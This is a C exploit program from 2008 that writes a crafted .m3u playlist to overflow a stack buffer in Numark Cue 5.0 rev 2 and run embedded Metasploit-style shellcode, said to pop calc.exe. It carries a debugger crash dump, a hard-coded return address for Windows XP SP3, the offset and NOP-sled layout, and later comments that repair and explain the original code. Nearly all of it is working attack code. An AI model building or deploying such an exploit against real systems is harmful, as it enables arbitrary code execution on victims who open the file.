# Title : Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow Exploit
# Published : 2008-09-06
# Author : fl0 fl0w
/*Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow
This exploit launches calc.exe. Classic stack buffer overflow: a playlist entry of roughly 500 bytes causes the exception.
Tested on Windows XP Pro SP3; compiled with Dev-C++ 4.9.9.2. The return address hard-coded in main() was chosen for that setup and is not expected to survive a different service pack, language build or patch level.
Debugger state at the crash, after loading the generated playlist:
|Access violation when executing [58414158]|
EAX 00000001
ECX 004C01B2 cue_tria.004C01B2
EDX 01030608
EBX 0309948D ASCII "I:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0013EC98 ASCII "eeeeeeeeeeeeeeeeeeeeeeeeeeeYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYr Of The Dog Again (2006)[T-Boyz]13. DMX - Life be my Song.mp3.jpg"
EBP 00000000
ESI 016016E0
EDI 00000000
EIP 58414158
Greetz to my friends Gil-Dong, Marsu, Expanders, Str0ke, Razvan, Vlad and all the people that I
know...find me in Regie.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>   /* Sleep(); only the cosmetic console bits in main() need it */
#endif
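/* Distance from the start of the generated file to the four bytes that land on
 * the saved return address: file_start is 40 bytes, so 509 bytes of 0x90
 * filler follow it before NEW_EIP is written at byte 549.  Found empirically by
 * the author (the register dump in the header shows EIP = 0x58414158, i.e.
 * "XAAX" from the filler pattern). */
#define OFFSET 549

/* Payload, "from metasploit" per the original comment; the header says it pops
 * calc.exe.  The leading bytes (eb 03 59 eb 05 e8 f8 ff ff ff followed by a run
 * of 0x49 'I') look like the decoder stub of an alphanumeric-encoded Metasploit
 * payload, but the listing does not name the encoder.  338 bytes with no
 * embedded 0x00, 0x0D or 0x0A, which matters because main() measures it with
 * strlen() and the playlist entry appears to be CR/LF-delimited.  Whether the
 * listing preserves the complete payload cannot be confirmed from here.
 * This is arbitrary machine code: build and run it only inside an isolated VM.
 *
 * The original page had lost the backslashes of the \x escapes; they are
 * restored here so the literal actually encodes bytes rather than ASCII text. */
char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
"\x70\x63";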
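/* Playlist preamble plus the opening of the entry that overflows: a
 * VirtualDJ-style .m3u header followed by the start of a Windows path ("I:\").
 * The original page carried this as hex escapes that had lost their
 * backslashes; the bytes are identical, just written readably.  40 bytes with no
 * embedded NUL, so the strlen() in main() covers all of it. */
char file_start[] =
    "#VirtualDJ Playlist\r\n"
    "#MixType=Smart\r\n"
    "I:\\";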
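/* Tail of the overflowing entry: the rest of the fake path/filename and its
 * CR LF line ending.  The original literal was hex-escaped (backslashes lost on
 * the page) and ended in 16 explicit zero bytes; declaring the array as 82
 * elements keeps the same sizeof and the same zero padding.  main() copies it
 * with strlen(), which stops at the first zero, so only the 65 visible
 * characters ever reach the file. */
char file_end[82] =
    "r Of The Dog Again (2006)[T-Boyz]\\13. DMX - Life be my Song.mp3\r\n";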
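/*
 * Write the crafted .m3u playlist to argv[1].
 *
 * File layout (every byte not explicitly written is 0x90 NOP filler):
 *   [file_start][filler up to byte OFFSET][NEW_EIP][15 x 0x90][shellcode][file_end][strlen(file_start) x 0x90]
 * so the return address lands at file offset OFFSET and the shellcode follows a
 * short NOP sled.  The trailing filler comes from the original buffer
 * arithmetic, which sized the buffer as if file_start were copied after the
 * offset as well.
 *
 * Fixes relative to the original: the buffer was never NUL-terminated, so the
 * fprintf("%s") that wrote it read past the heap block (undefined behaviour)
 * and would have stopped at any zero byte; the write is now an fwrite() of an
 * explicit length.  malloc() is checked, the stream is closed and checked, and a
 * failure to open or write the output exits with 1 instead of reporting success.
 * The "\n" escapes in the banners had also lost their backslashes on the page.
 *
 * Returns 0 on success (and on a usage error, as before), 1 on any failure.
 */
int main(int argc, char *argv[])
{
    FILE *out;
    unsigned char *buffer;
    size_t start_len, sc_len, end_len, total, offset;
    /* Value written over the saved return address at file offset OFFSET.
     * Hard-coded for the author's machine (WinXP Pro SP3 per the header);
     * presumably a jmp/call-esp style trampoline in a system DLL there, but the
     * listing does not say which.  Verify it in a debugger before relying on it
     * on any other service pack, language build or patch level.  Its bytes
     * (F0 69 83 7C) contain no 0x00/0x0D/0x0A, which presumably matters for a
     * line-delimited playlist entry. */
    unsigned int NEW_EIP = 0x7C8369F0;

    if (argc < 2) {
        printf("****************************************\n");
        printf("USAGE IS:");
        printf("FileName.m3u\n");
        printf("Credits for finding the bug and sploit go to fl0 fl0w \n");
        printf("****************************************\n");
#ifdef _WIN32
        system("color 02");   /* cosmetic console colour; cmd.exe only */
        Sleep(2000);
#endif
        return 0;
    }

    start_len = strlen(file_start);
    sc_len = strlen(shellcode);
    end_len = strlen(file_end);   /* stops at the literal's first embedded NUL */

    /* Original size minus the one-byte terminator slot it never filled. */
    total = OFFSET + sizeof NEW_EIP + 15 + sc_len + end_len + start_len;

    buffer = malloc(total);
    if (buffer == NULL) {
        printf("error");
        return 1;
    }
    memset(buffer, 0x90, total);

    memcpy(buffer, file_start, start_len);
    offset = OFFSET;
    /* memcpy emits NEW_EIP in host byte order, which is the little-endian
     * layout the x86 target expects only when this builder itself runs on a
     * little-endian host. */
    memcpy(buffer + offset, &NEW_EIP, sizeof NEW_EIP);
    offset += sizeof NEW_EIP;
    offset += 15;   /* NOP sled between the return address and the shellcode */
    memcpy(buffer + offset, shellcode, sc_len);
    offset += sc_len;
    memcpy(buffer + offset, file_end, end_len);
    offset += end_len;
    /* The remaining total - offset bytes stay 0x90 (trailing filler). */

    out = fopen(argv[1], "wb");
    if (out == NULL) {
        printf("error");
        free(buffer);
        return 1;
    }
    /* Explicit length: the payload is binary and must not be truncated at a
     * zero byte or depend on a terminator. */
    if (fwrite(buffer, 1, total, out) != total || fclose(out) != 0) {
        printf("error");
        free(buffer);
        return 1;
    }
    free(buffer);

    printf("************************************************************\n");
    printf("Numark Cue 5.0 rev 2 .M3U File Stack Buffer Overflow\n");
    printf("Credits for finding the bug and sploit go to fl0 fl0w \n");
    printf("File successfully buit,open with Numark Cue :)\n");
    printf("************************************************************\n");
#ifdef _WIN32
    system("color 03");   /* cosmetic console colour; cmd.exe only */
#endif
    return 0;
}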